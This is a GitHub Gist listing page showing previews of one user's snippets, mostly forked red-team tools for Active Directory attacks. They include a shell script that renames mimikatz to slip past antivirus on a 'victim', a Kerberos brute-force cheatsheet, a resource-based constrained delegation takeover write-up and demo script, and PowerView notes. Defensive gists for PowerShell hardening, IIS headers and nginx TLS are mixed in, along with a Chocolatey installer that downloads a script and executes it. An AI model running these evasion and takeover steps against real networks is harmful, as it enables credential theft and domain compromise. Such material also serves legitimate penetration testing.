Skip to content

Instantly share code, notes, and snippets.

@michiiii
michiiii / PowerView-3.0-tricks.ps1
Created Nov 23, 2021 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@michiiii
michiiii / kerberos_attacks_cheatsheet.md
Created Nov 23, 2021 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@michiiii
michiiii / Workstation-Takeover.md
Created Nov 23, 2021 — forked from S3cur3Th1sSh1t/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@michiiii
michiiii / PowerShellHardeningCheck.ps1
Last active Jun 14, 2021
Checks a workstation regarding basic PowerShell hardening, Applocker and System
View PowerShellHardeningCheck.ps1
function Test-RegistryValue {
param (
[parameter(Mandatory=$true)]
[ValidateNotNullOrEmpty()]$Path,
[parameter(Mandatory=$true)]
[ValidateNotNullOrEmpty()]$Value
)
@michiiii
michiiii / SetIISSecurityHeader.ps1
Last active Sep 14, 2021
Quick and dirty commands to set basic security header in IIS
View SetIISSecurityHeader.ps1
### Quick and dirty command set to set basic security header on IIS
## Please adjust the values according to your requirements
Add-WebConfigurationProperty //system.webServer/httpProtocol/customHeaders "IIS:\sites\" -AtIndex 0 -Name collection -Value @{name='Cache-Control';value='max-age=31536000'}
Write-Host 'Cache-Control header is set.' #Please adjust as required
Add-WebConfigurationProperty //system.webServer/httpProtocol/customHeaders "IIS:\sites\" -AtIndex 0 -Name collection -Value @{name='Permissions-Policy';value='fullscreen=(), geolocation=()'}
Write-Host 'Permissions-Policy header is set.' #Please adjust as required
Add-WebConfigurationProperty //system.webServer/httpProtocol/customHeaders "IIS:\sites\" -AtIndex 0 -Name collection -Value @{name='Referrer-Policy';value='strict-origin-when-cross-origin'}
Write-Host 'Referrer-Policy header is set.' #Please adjust as required
Add-WebConfigurationProperty //system.webServer/httpProtocol/customHeaders "IIS:\sites\" -AtIndex 0 -Name collection -Value @{na
@michiiii
michiiii / rbcd_demo.ps1
Created Apr 28, 2021 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@michiiii
michiiii / Jenkinsfile
Created Apr 28, 2021 — forked from HarmJ0y/Jenkinsfile
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
View windows-basic.ps1
#Requires -RunAsAdministrator
############################################################
# Install Chocolatey
############################################################
if (!(Get-Package -Name *choco*))
{
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
}
@michiiii
michiiii / nginx-tls.conf
Created Mar 17, 2021 — forked from gavinhungry/nginx-tls.conf
Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating
View nginx-tls.conf
#
# Name: nginx-tls.conf
# Auth: Gavin Lloyd <gavinhungry@gmail.com>
# Desc: Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating
#
# Enables HTTP/2, PFS, HSTS and OCSP stapling. Configuration options not related
# to SSL/TLS are not included here.
#
# Additional tips:
#